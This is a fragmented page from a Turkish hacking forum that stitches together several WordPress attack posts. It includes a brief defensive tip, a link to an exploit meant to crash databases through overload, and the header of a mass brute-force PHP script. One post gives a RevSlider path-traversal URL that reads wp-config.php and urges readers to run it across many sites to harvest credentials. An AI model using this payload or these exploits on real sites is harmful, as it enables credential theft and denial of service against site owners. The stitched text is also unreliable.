Eski bir web tarayıcısı kullanıyorsunuz. Bu veya diğer siteleri görüntülemekte sorunlar yaşayabilirsiniz.. Tarayıcınızı güncellemeli veya alternatif bir tarayıcı kullanmalısınız.
Wordpress sitemize saldırı alıyoruz şifre ne yapıp ne edip wordlist ile taratıp bulunuyor. Brute Force olmasa bile bypass ile Dashboard'a erişilebiliniyor.
*Bunu engellemek için ne yapacağız?*
* wp-admin girişine .htaccess ile ek bir şifre koyacağız.*
- Öncelikle hostunuzda Cpanel üzerinde...
Bildiğiniz üzere wordpress veri tabanlarında userler için özel şifreleme vardır (Salt) yani bu durumda sistemde kasma olur ve aşırı yükleme olursa veritabanı çöker.
Bu exploiti bir kaç kişi açıtığınızı var sayarsak veritabanının çökmesine neden olacaktır.
Exploit: http://link.tl/1xJHv
Konuyu şu linkteki konu için açtım.Videolu anlatımı daha iyi olur yeniler için.
http://spyhackerz.com/forum/threads/brute-force-kullan%C4%B1m%C4%B1-hack.6416/
<?
# Priv8 Wordpress Mass brute Force ^_*
# Coded by Lagrip-dz
# Devloped by Th3 K!LL3r Dz
# Style Leacked By Th3 K!LL3r Dz
# copyright to sec4ever.com
# special Greet'z to : n4ssim , Damane2011
# Greet'z to : all sec4ver members...
Isko~
Konu
mass bruteforcer
wordpresswordpresshackwordpress mass bruteforce
Sitelerin sonuna aşağıdaki url yi ekleyin configleri toplayın , birçok sitede açık aktif şekilde durmaktadır.
100 sitede deneseniz en az 20 tane config alırsınız.
wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Legal Notice:
The website spyhackerz.org is classified as a “Hosting Provider” (“Yer Sağlayıcı”) within the meaning of Article 2, paragraph 1, subparagraph (m) and Article 5 of Law No. 5651. All content is created entirely by users without any prior approval, similar to platforms such as X, Instagram, Facebook, etc.
As a hosting provider, spyhackerz.org is not obliged to monitor, control, or investigate user-generated content or any potentially unlawful sharing. There are no “attack teams” on spyhackerz.org, and no harmful activities are carried out against websites located in Türkiye.
SPYHACKERZ is not responsible for any individual hacking-related forum activities carried out by its members. If any hacking activity is conducted against your websites using the name spyhackerz.org, all responsibility lies solely with the member who performs the attack.